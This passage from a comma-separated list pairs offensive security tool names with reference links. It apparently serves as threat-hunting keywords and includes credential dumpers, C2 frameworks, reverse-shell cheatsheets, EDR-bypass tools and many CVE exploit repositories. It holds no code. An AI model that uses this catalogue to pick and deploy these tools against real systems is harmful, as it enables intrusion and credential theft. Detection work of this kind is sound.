+"masscan","https://github.com/robertdavidgraham/masscan" +"megatools","https://github.com/megous/megatools" +"Memcrashed-DDoS-Exploit","https://github.com/649/Memcrashed-DDoS-Exploit" +"merlin","https://github.com/Ne0nd0g/merlin" +"metagoofil","https://github.com/laramies/metagoofi" +"metame","https://github.com/a0rtega/metame" +"metasploit","https://www.metasploit.com/" +"metasploit","N/A" +"metasploit","https://github.com/rapid7/metasploit-framework" +"metasploit","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"metasploit-payloads","https://github.com/rapid7/metasploit-payloads" +"metatwin","https://github.com/threatexpress/metatwin" +"MeteTool","https://github.com/S-S-X/metatool" +"mhydeath","https://github.com/zer0condition/mhydeath" +"micr0_shell","https://github.com/senzee1984/micr0_shell" +"MicroBurst","https://github.com/NetSPI/MicroBurst" +"mimikatz","https://github.com/skelsec/pypykatz" +"mimikatz","https://github.com/SafeBreach-Labs/EDRaser" +"mimikatz","https://github.com/vyrus001/go-mimikatz" +"mimikatz","https://github.com/Stealthbits/poshkatz" +"mimikatz","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1" +"mimikatz","https://github.com/g4uss47/Invoke-Mimikatz" +"mimikatz","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference" +"mimikatz","https://github.com/gentilkiwi/mimikatz" +"mimikatz","https://github.com/gentilkiwi/" +"mimikittenz","https://github.com/orlyjamie/mimikittenz" +"mimipenguin","https://github.com/huntergregal/mimipenguin" +"mitm6","https://github.com/fox-it/mitm6" +"mitmAP","https://github.com/xdavidhu/mitmAP" +"MITMf","https://github.com/byt3bl33d3r/MITMf" +"mitmproxy","https://github.com/mitmproxy/mitmproxy" +"mitmsocks4j","https://github.com/Akdeniz/mitmsocks4j" +"Mobile-Security-Framework","https://github.com/MobSF/Mobile-Security-Framework-MobSF" +"Mobile-Security-Framework-MobSF","https://github.com/MobSF/Mobile-Security-Framework-MobSF" +"MockDirUACBypass","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass" +"modDetective","https://github.com/itsKindred/modDetective" +"Modlishka ","https://github.com/drk1wi/Modlishka" +"modproble","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml" +"monkey","https://github.com/guardicore/monkey" +"morphHTA","https://github.com/vysecurity/morphHTA" +"mortar","https://github.com/0xsp-SRD/mortar" +"mousejack","https://github.com/BastilleResearch/mousejack" +"movefile64.exe","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin" +"movfuscator","https://github.com/xoreaxeaxeax/movfuscator" +"MpCmdRun","N/A" +"Mr.SIP","https://github.com/meliht/Mr.SIP" +"mRemoteNG-Decrypt","https://github.com/haseebT/mRemoteNG-Decrypt" +"MSBuildShell","https://github.com/Cn33liz/MSBuildShell" +"MSDAT","https://github.com/quentinhardy/msdat" +"msfpc","https://github.com/g0tmi1k/msfpc" +"msfvenom","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom" +"Mshikaki","https://github.com/trevorsaudi/Mshikaki" +"msi-search","https://github.com/mandiant/msi-search" +"msldapdump","https://github.com/dievus/msLDAPDump" +"MSOLSpray","https://github.com/dafthack/MSOLSpray" +"mspass","https://www.nirsoft.net/utils/mspass.html" +"mssqlproxy","https://github.com/blackarrowsec/mssqlproxy" +"MultiPotato","https://github.com/S3cur3Th1sSh1t/MultiPotato" +"Muscle VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"My Browser Vpn","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"myexternalip.com","https://myexternalip.com/raw" +"Mystikal","https://github.com/D00MFist/Mystikal" +"mythic","https://github.com/MythicAgents/freyja/" +"mythic","https://github.com/MythicAgents/merlin" +"mythic","https://github.com/MythicAgents/Athena" +"mythic","https://github.com/its-a-feature/Mythic" +"mythic","https://github.com/MythicAgents/Apollo/" +"nac_bypass","https://github.com/scipag/nac_bypass" +"nanodump","https://github.com/fortra/nanodump" +"nanorobeus","https://github.com/wavvs/nanorobeus" +"nbtscan","https://github.com/charlesroelli/nbtscan" +"nbtstat","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/nbtstat" +"nc","N/A" +"nc","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf" +"nc","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"ncat","N/A" +"ncrack","https://github.com/nmap/ncrack" +"Neo4j","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory" +"nessus","https://fr.tenable.com/products/nessus" +"net","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/" +"net","N/A" +"net","https://github.com/RoseSecurity/Red-Teaming-TTPs" +"net","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/" +"netcat","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" +"netcat","http://netcat.sourceforge.net/" +"net-creds","https://github.com/DanMcInerney/net-creds" +"NetExec","https://github.com/Pennyw0rth/NetExec" +"Net-GPPPassword","https://github.com/outflanknl/Net-GPPPassword" +"NetLoader","https://github.com/Flangvik/NetLoader" +"NetNTLMtoSilverTicket","https://github.com/NotMedic/NetNTLMtoSilverTicket" +"netpass","https://www.nirsoft.net/utils/network_password_recovery.html" +"netscan","https://www.softperfect.com/products/networkscanner/" +"netsh","N/A" +"netsh","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF" +"netsh","https://github.com/ice-wzl/wmiexec2" +"NetshRun","https://github.com/gtworek/PSBits/blob/master/NetShRun" +"netsniff-ng","https://packages.debian.org/fr/sid/netsniff-ng" +"netstat","N/A" +"NetworkMiner","http://www.netresec.com/?page=NetworkMiner" +"ngrok","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"Nightmangle","https://github.com/1N73LL1G3NC3x/Nightmangle" +"nikto","https://github.com/sullo/nikto" +"NimBlackout","https://github.com/Helixo32/NimBlackout" +"nimbo-c2","https://github.com/itaymigdal/Nimbo-C2" +"nimcrypt","https://github.com/icyguider/nimcrypt" +"Nimcrypt2","https://github.com/icyguider/Nimcrypt2" +"NimExec","https://github.com/frkngksl/NimExec" +"nimplant","https://github.com/chvancooten/NimPlant" +"Ninja","https://github.com/ahmedkhlief/Ninja" +"nipe","https://github.com/htrgouvea/nipe" +"nirsoft tools","nirsoft.net" +"nirsoft tools","N/A" +"nishang","https://github.com/samratashok/nishang/tree/master/Antak-WebShell" +"nishang","https://github.com/samratashok/nishang" +"NixImports","https://github.com/dr4k0nia/NixImports" +"nltest","N/A" +"nmap","https://nmap.org/" +"nmap","https://github.com/zmap/zmap" +"nmap","https://github.com/vulnersCom/nmap-vulners" +"nmap","N/A" +"nmap","https://svn.nmap.org/nmap/scripts/" +"nmap","https://nmap.org/book/nse-usage.html" +"nmap","https://github.com/nccgroup/nmap-nse-vulnerability-scripts" +"nmap","https://github.com/Diverto/nse-log4shell" +"nmap","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts" +"nmap","https://github.com/shadawck/nse-install" +"nmap","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"nmap","https://github.com/nmap/nmap" +"NoFilter","https://github.com/deepinstinct/NoFilter" +"nopowershell","https://github.com/bitsadmin/nopowershell" +"No-powershell","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs" +"NordVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"noseyparker","https://github.com/praetorian-inc/noseyparker" +"Nosql-Exploitation-Framework","https://github.com/torque59/Nosql-Exploitation-Framework" +"NoSQLMap","https://github.com/codingo/NoSQLMap" +"novelbfh","https://github.com/nyxgeek/classic_hacking_tools" +"nping","https://nmap.org/nping/" +"NPPSpy","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy" +"nps_payload","https://github.com/trustedsec/nps_payload" +"ntdissector","https://github.com/synacktiv/ntdissector" +"ntdlll-unhooking-collection","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection" +"NTDLLReflection","https://github.com/TheD1rkMtr/NTDLLReflection" +"NtdllUnpatcher","https://github.com/Signal-Labs/NtdllUnpatcher" +"ntdsutil","N/A" +"ntlmquic","https://github.com/xpn/ntlmquic" +"NTLMRelay2Self","https://github.com/med0x2e/NTLMRelay2Self" +"ntlmscan","https://github.com/nyxgeek/ntlmscan" +"NTMLRecon","https://github.com/pwnfoo/NTLMRecon" +"NTMLRecon","https://github.com/puzzlepeaches/NTLMRecon" +"NtRemoteLoad","https://github.com/florylsk/NtRemoteLoad" +"NtRights","https://github.com/gtworek/PSBits/tree/master/NtRights" +"Nuages","https://github.com/p3nt4/Nuages" +"Nucleus VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"nysm","https://github.com/eeriedusk/nysm" +"o365-attack-toolkit","https://github.com/mdsecactivebreach/o365-attack-toolkit" +"o365creeper","https://github.com/LMGsec/o365creeper" +"o365enum","https://github.com/gremwell/o365enum" +"o365recon","https://github.com/nyxgeek/o365recon" +"obfy","https://github.com/fritzone/obfy" +"octopus","https://github.com/mhaskar/Octopus" +"OffensiveCSharp","https://github.com/matterpreter/OffensiveCSharp/tree/master" +"OffensiveNotion","https://github.com/mttaggart/OffensiveNotion" +"Offensive-Payloads","https://github.com/InfoSecWarrior/Offensive-Payloads/" +"Office-DDE-Payloads","https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads" +"Oh365UserFinder","https://github.com/dievus/Oh365UserFinder" +"OMG-Credz-Plz","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz" +"OMGLogger","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger" +"omg-payloads","https://github.com/hak5/omg-payloads" +"onedrive_user_enum","https://github.com/nyxgeek/onedrive_user_enum" +"One-Lin3r","https://github.com/D4Vinci/One-Lin3r" +"onesixtyone","https://github.com/trailofbits/onesixtyone" +"onex","https://github.com/rajkumardusad/onex" +"onex","https://github.com/cube0x0/MiniDump" +"onionscan","https://onionscan.org/" +"openbullet","https://github.com/openbullet/OpenBullet2" +"openbullet","https://github.com/openbullet/openbullet" +"Openssh","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors" +"openvas","https://www.openvas.org/" +"Operative Framework","https://github.com/graniet/operative-framework" +"ophcrack","https://gitlab.com/objectifsecurite/ophcrack" +"orbitaldump","https://github.com/k4yt3x/orbitaldump" +"OSCP-Archives","https://github.com/CyDefUnicorn/OSCP-Archives" +"OSCP-Cheatsheets","https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting.md" +"Osmedeus","https://github.com/j3ssie/osmedeus" +"OWASP","https://github.com/OWASP" +"p0f","https://www.kali.org/tools/p0f/" +"p0wnedShell","https://github.com/Cn33liz/p0wnedShell" +"p0wny-shell","https://github.com/flozz/p0wny-shell" +"P4wnP1","https://github.com/RoganDawes/P4wnP1" +"Pachine","https://github.com/ly4k/Pachine" +"PackMyPayload","https://github.com/mgeeky/PackMyPayload/" +"pacu","https://github.com/RhinoSecurityLabs/pacu" +"padre","https://github.com/glebarez/padre" +"ParamPamPam","https://github.com/Bo0oM/ParamPamPam" +"parrot os","https://www.parrotsec.org/download/" +"PassDetective","https://github.com/aydinnyunus/PassDetective" +"PassHunt","https://github.com/Dionach/PassHunt" +"passphrase-wordlist","https://github.com/initstring/passphrase-wordlist" +"PassTheChallenge","https://github.com/ly4k/PassTheChallenge" +"Passware Kit Forensic","https://www.passware.com/kit-forensic/" +"passwd","N/A" +"passwordfox","https://www.nirsoft.net/utils/passwordfox.html" +"Password-Scripts","https://github.com/laconicwolf/Password-Scripts" +"pastebin","pastebin.com" +"patator","https://github.com/lanjelot/patator" +"Pateensy","https://github.com/screetsec/Pateensy" +"PayGen","https://github.com/youhacker55/PayGen" +"Payload-Download-Cradles","https://github.com/VirtualAlllocEx/Payload-Download-Cradles" +"PayloadsAllTheThings","https://github.com/Bo0oM/PayloadsAllTheThings" +"Pazuzu","https://github.com/BorjaMerino/Pazuzu" +"PcapXray","https://github.com/Srinivas11789/PcapXray" +"Pcredz","https://github.com/lgandx/Pcredz" +"pdbedit","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"pe_to_shellcode","https://github.com/hasherezade/pe_to_shellcode" +"PEASS","https://github.com/carlospolop/PEASS-ng" +"peCloak","https://github.com/v-p-b/peCloakCapstone/blob/master/peCloak.py" +"pentestbox","https://pentestbox.org/fr/" +"PENTESTING-BIBLE","https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE" +"pentest-machine","https://github.com/DanMcInerney/pentest-machine" +"PE-Obfuscator","https://github.com/TheD1rkMtr/PE-Obfuscator" +"PerfExec","https://github.com/0xthirteen/PerfExec" +"petipotam","https://github.com/topotam/PetitPotam" +"Pezor","https://github.com/phra/PEzor" +"Phant0m","https://github.com/hlldz/Phant0m" +"PhantomService","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService" +"phishery","https://github.com/ryhanson/phishery" +"phishing-HTML-linter","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing" +"phoenix miner","N/A" +"PhoneInfoga","https://github.com/sundowndev/PhoneInfoga" +"php","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"PhpSploit","https://github.com/nil0x42/phpsploit" +"phuip-fpizdam","https://github.com/neex/phuip-fpizdam" +"pingcastle","https://www.pingcastle.com/" +"pingcastle","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle" +"pingcastle","https://github.com/sense-of-security/ADRecon" +"pingcastle","https://github.com/vletoux/pingcastle" +"ping-sweep","https://github.com/libresec/ping-sweep" +"PipeViewer ","https://github.com/cyberark/PipeViewer" +"pivotnacci","https://github.com/blackarrowsec/pivotnacci" +"PKINITtools","https://github.com/dirkjanm/PKINITtools" +"pktmon","https://learn.microsoft.com/en-us/windows-server/networking/technologies/pktmon/pktmon" +"POC","https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit" +"POC","https://github.com/random-robbie/cve-2022-23131-exp" +"POC","https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py" +"POC","https://github.com/pykiller/CVE-2022-23131" +"POC","https://github.com/qazbnm456/awesome-cve-poc" +"POC","https://github.com/QHpix/CVE-2021-44521" +"POC","https://github.com/Ridter/noPac" +"POC","https://github.com/risksense/zerologon" +"POC","https://github.com/sfewer-r7/CVE-2023-34362" +"POC","https://github.com/rapid7/metasploit-framework/blob/62bfe03b50a22785b59a069319520531f2663b2b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb" +"POC","https://github.com/ricardojba/Invoke-noPac" +"POC","https://github.com/ricardojba/noPac" +"POC","https://github.com/puckiestyle/CVE-2022-0847" +"POC","https://github.com/mtivadar/windows10_ntfs_crash_dos" +"POC","https://github.com/nikhil1232/LibSSH-Authentication-Bypass" +"POC","https://github.com/nowsecure/dirtycow" +"POC","https://github.com/mrchucu1/CVE-2022-0847-Docker" +"POC","https://github.com/Mr-xn/cve-2022-23131" +"POC","https://github.com/Mr-xn/sunlogin_rce" +"POC","https://github.com/positive-security/dompdf-rce" +"POC","https://github.com/Privia-Security/ADZero" +"POC","https://github.com/ptresearch/AttackDetection" +"POC","https://github.com/onecloudemoji/CVE-2022-30190" +"POC","https://github.com/peterspbr/dirty-pipe-otw" +"POC","https://github.com/plummm/CVE-2022-27666" +"POC","https://github.com/sherlocksecurity" +"POC","https://github.com/yasserjanah/CVE-2020-5902" +"POC","https://github.com/yuanLink/CVE-2022-26809" +"POC","https://github.com/yunuscadirci/CallStranger" +"POC","https://github.com/WiIs0n/Zerologon_CVE-2020-1472" +"POC","https://github.com/worawit/MS17-010" +"POC","https://github.com/xndpxs/CVE-2022-0847" +"POC","https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html" +"POC","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing" +"POC","N/A" +"POC","https://github.com/ZecOps/CVE-2020-0796-LPE-POC" +"POC","https://github.com/zhzyker/CVE-2020-5902/" +"POC","https://github.com/zwjjustdoit/cve-2022-23131" +"POC","https://github.com/welk1n/JNDI-Injection-Exploit" +"POC","https://github.com/sinsinology/CVE-2023-20887" +"POC","https://github.com/smgorelik/Windows-RCE-exploits" +"poc","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY" +"POC","https://github.com/sherlocksecurity/VMware-CVE-2022-22954" +"POC","https://github.com/si1ent-le/CVE-2022-0847" +"POC","https://github.com/SimoneLazzaris/ditty" +"POC","https://github.com/trganda/CVE-2022-23131" +"POC","https://github.com/WazeHell/sam-the-admin/tree/main/utils" +"POC","https://github.com/websecnl/CVE-2022-26809" +"POC","https://github.com/tangxiaofeng7/CVE-2022-22965-Spring-CachedintrospectionResults-Rce" +"POC","https://github.com/timwr/CVE-2016-5195" +"poc","https://github.com/Trackflaw/CVE-2023-23397" +"POC","https://github.com/carlosevieira/Dirty-Pipe" +"POC","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE" +"POC","https://github.com/colincowie/Safer_PoC_CVE-2022-22965" +"POC","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker" +"POC","https://github.com/bbaranoff/CVE-2022-0847" +"POC","https://github.com/Bonfee/CVE-2022-0995" +"POC","https://github.com/drgreenthumb93/CVE-2022-30190-follina" +"POC","https://github.com/dunderhay/CVE-2020-5902" +"POC","https://github.com/exrienz/DirtyCow" +"POC","https://github.com/Crusaders-of-Rust/CVE-2022-0185" +"POC","https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit" +"POC","https://github.com/cube0x0/noPac" +"POC","https://github.com/Ayrx/CVE-2021-4034 " +"POC","https://github.com/4luc4rdr5290/CVE-2022-0847" +"POC","https://github.com/ahrixia/CVE_2022_0847" +"POC","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits" +"POC","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5" +"POC","https://github.com/0tt7/CVE-2022-23131" +"POC","https://github.com/1mxml/CVE-2022-23131" +"POC","https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit" +"POC","https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE" +"POC","https://github.com/Ayrx/CVE-2021-4034" +"POC","https://github.com/antx-code/CVE-2022-0847" +"POC","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell" +"POC","https://github.com/aqhmal/CVE-2020-5902-Scanner" +"POC","https://github.com/Fa1c0n35/zabbix-cve-2022-23131" +"POC","https://github.com/KaLendsi/CVE-2022-21882" +"POC","https://github.com/kh4sh3i/Spring-CVE" +"POC","https://github.com/knqyf263/CVE-2022-0847" +"POC","https://github.com/JMousqueton/PoC-CVE-2022-30190" +"POC","https://github.com/jweny/zabbix-saml-bypass-exp" +"poc","https://github.com/ka7ana/CVE-2023-23397" +"POC","https://github.com/lucksec/CVE-2022-0847" +"POC","https://github.com/luijait/PwnKit-Exploit" +"POC","https://github.com/michaelpoznecki/zerologon" +"POC","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed" +"POC","https://github.com/L0ading-x/cve-2022-23131" +"POC","https://github.com/lcashdol/Exploits" +"POC","https://github.com/jiansiting/CVE-2020-5902" +"POC","https://github.com/gottburgm/Exploits" +"POC","https://github.com/gyaansastra/CVE-2022-0847" +"POC","https://github.com/hacksysteam/CVE-2023-21608" +"POC","https://github.com/febinrev/dirtypipez-exploit" +"POC","https://github.com/FireFart/dirtycow" +"POC","https://github.com/gbonacini/CVE-2016-5195" +"POC","https://github.com/initstring/dirty_sock" +"POC","https://github.com/ItsNee/Follina-CVE-2022-30190-POC" +"POC","https://github.com/jas502n/CVE-2020-5902" +"poc","https://github.com/Hashi0x/PoC-CVE-2023-21554" +"POC","https://github.com/imfiver/CVE-2022-0847" +"POC","https://github.com/Immersive-Labs-Sec/nimbuspwn" +"poisontap","https://github.com/samyk/poisontap" +"polenum","https://salsa.debian.org/pkg-security-team/polenum" +"portscan","https://github.com/zs5460/portscan" +"poshc2","https://github.com/nettitude/PoshC2" +"POSTDump","https://github.com/YOLOP0wn/POSTDump" +"PowerBruteLogon","https://github.com/DarkCoderSc/PowerBruteLogon" +"powerextract","https://github.com/powerseb/PowerExtract" +"PowerForensics","https://github.com/Invoke-IR/PowerForensics" +"PowerLessShell","https://github.com/Mr-Un1k0d3r/PowerLessShell" +"Powermad","https://github.com/Kevin-Robertson/Powermad" +"PowerMemory","https://github.com/giMini/PowerMemory" +"PowerOPS","https://github.com/fdiskyou/PowerOPS" +"power-pwn","https://github.com/mbrg/power-pwn" +"PowerSCCM","https://github.com/PowerShellMafia/PowerSCCM" +"PowerSharpPack","https://github.com/S3cur3Th1sSh1t/PowerSharpPack" +"PowerShdll","https://github.com/p3nt4/PowerShdll" +"powershell","https://github.com/theyoge/AD-Pentesting-Tools/blob/main/Invoke-SDPropagator.ps1" +"powershell","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory" +"powershell","https://github.com/reveng007/C2_Server" +"powershell","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" +"powershell","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/" +"powershell","N/A" +"powershell","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/" +"powershell","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/" +"powershell","https://github.com/byt3bl33d3r/CrackMapExec" +"powershell","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz" +"powershell","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference" +"powershell","https://gist.github.com/analyticsearch/7453d22d737e46657eb57c44d5cf4cbb" +"powershell","https://github.com/Pennyw0rth/NetExec" +"powershell","https://github.com/Porchetta-Industries/CrackMapExec" +"powershell","https://github.com/ice-wzl/wmiexec2" +"powershell","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1" +"PowerShellArsenal","https://github.com/mattifestation/PowerShellArsenal" +"PowershellKerberos","https://github.com/MzHmO/PowershellKerberos" +"PowerShell-Suite","https://github.com/FuzzySecurity/PowerShell-Suite" +"PowerShx","https://github.com/iomoath/PowerShx" +"PowerSploit","https://github.com/PowerShellMafia/PowerSploit" +"PowerStager","https://github.com/z0noxz/powerstager" +"PowerUpSQL","https://github.com/NetSPI/PowerUpSQL" +"powerview","https://github.com/zloeber/PSAD/blob/master/src/inprogress/Add-ObjectACL.ps1" +"powerview","https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon" +"PP VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"PPLBlade","https://github.com/tastypepperoni/PPLBlade" +"ppldump","https://github.com/itm4n/PPLdump" +"PPLFault","https://github.com/gabriellandau/PPLFault" +"PPLKiller","https://github.com/RedCursorSecurityConsulting/PPLKiller" +"Prime VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"primusC2","https://github.com/Primusinterp/PrimusC2" +"printspoofer","https://github.com/itm4n/PrintSpoofer" +"Priv2Admin","https://github.com/gtworek/Priv2Admin" +"Private Internet Access","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"PrivescCheck","https://github.com/itm4n/PrivescCheck" +"PrivExchange","https://github.com/dirkjanm/PrivExchange" +"PrivFu","https://github.com/daem0nc0re/PrivFu/" +"PrivilegeEscalation","https://github.com/LouisVallat/PrivilegeEscalation" +"Privileger","https://github.com/MzHmO/Privileger" +"PrivKit","https://github.com/mertdas/PrivKit" +"Probable-Wordlists","https://github.com/berzerk0/Probable-Wordlists" +"procdump","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF" +"Procdump","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump" +"processhacker","https://processhacker.sourceforge.io/" +"procmon","N/A" +"produkey","https://www.nirsoft.net/utils/product_cd_key_viewer.html" +"prometheus","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment" +"Pron VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"ProxFlow","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Proxmark","https://github.com/Proxmark/proxmark3" +"Proxy SwitchyOmega","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Proxy SwitchySharp","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"proxychains","https://github.com/haad/proxychains" +"ProxyFlow","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"ProxyShell","https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt" +"PRT","https://github.com/RUB-NDS/PRT" +"PS2EXE","https://github.com/MScholtes/PS2EXE" +"PSAmsi","https://github.com/cobbr/PSAmsi" +"PSAttack","https://github.com/jaredhaight/PSAttack" +"PSBits","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges" +"PSByPassCLM","https://github.com/padovah4ck/PSByPassCLM" +"psexec","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec" +"psloggedon","https://learn.microsoft.com/en-us/sysinternals/downloads/psloggedon" +"Pspersist","https://github.com/TheD1rkMtr/Pspersist" +"pspy","https://github.com/DominicBreuker/pspy" +"PSRansom","https://github.com/JoelGMSec/PSRansom" +"PSRecon","https://github.com/gfoss/PSRecon" +"PSSW100AVB","https://github.com/tihanyin/PSSW100AVB" +"pth-toolkit","https://github.com/byt3bl33d3r/pth-toolkit" +"ptunnel-ng","https://github.com/utoni/ptunnel-ng" +"pupy","https://github.com/n1nj4sec/pupy" +"PureVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"PurplePanda","https://github.com/carlospolop/PurplePanda" +"Push VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"PWCrack","https://github.com/L-codes/pwcrack-framework" +"pwdump","https://ftp.samba.org/pub/samba/pwdump/" +"pwn_jenkins","https://github.com/gquere/pwn_jenkins" +"pwnagotchi","https://github.com/evilsocket/pwnagotchi" +"pwnat","https://github.com/samyk/pwnat" +"pwndrop","https://github.com/kgretzky/pwndrop" +"pxethief","https://github.com/MWR-CyberSec/PXEThief" +"py2exe","https://github.com/py2exe/py2exe" +"pydictor","https://github.com/LandGrey/pydictor" +"PyExec","https://github.com/OlivierLaflamme/PyExec" +"pyGPOAbuse","https://github.com/Hackndo/pyGPOAbuse" +"pyinstaller","https://www.pyinstaller.org/" +"pyLAPS","https://github.com/p0dalirius/pyLAPS" +"pymultitor","https://github.com/realgam3/pymultitor" +"pypykatz","https://github.com/skelsec/pypykatz" +"pyrdp","https://github.com/GoSecure/pyrdp" +"pyshell","https://github.com/JoelGMSec/PyShell" +"pysoserial","https://github.com/aStrowxyu/Pysoserial" +"Python-Wordlist-Generator","https://github.com/agusmakmun/Python-Wordlist-Generator" +"pywerview","https://github.com/the-useless-one/pywerview" +"pywhisker","https://github.com/ShutdownRepo/pywhisker" +"pywsus","https://github.com/GoSecure/pywsus" +"QuasarRAT","https://github.com/quasar/Quasar" +"qwinsta","N/A" +"Radare2","https://github.com/radareorg/radare2" +"RadareEye","https://github.com/souravbaghz/RadareEye" +"RainbowCrack","http://project-rainbowcrack.com/" +"rapid7","https://www.rapid7.com/products/nexpose/" +"rapid7","https://www.rapid7.com/" +"RaRCE","https://github.com/ignis-sec/CVE-2023-38831-RaRCE" +"RasmanPotato","https://github.com/crisprss/RasmanPotato" +"ratchatgpt","https://github.com/spartan-conseil/ratchatpt" +"ratchatpt","https://github.com/spartan-conseil/ratchatpt" +"rclone","https://github.com/rclone/rclone" +"RDE1","https://github.com/g0h4n/RDE1" +"rderzh 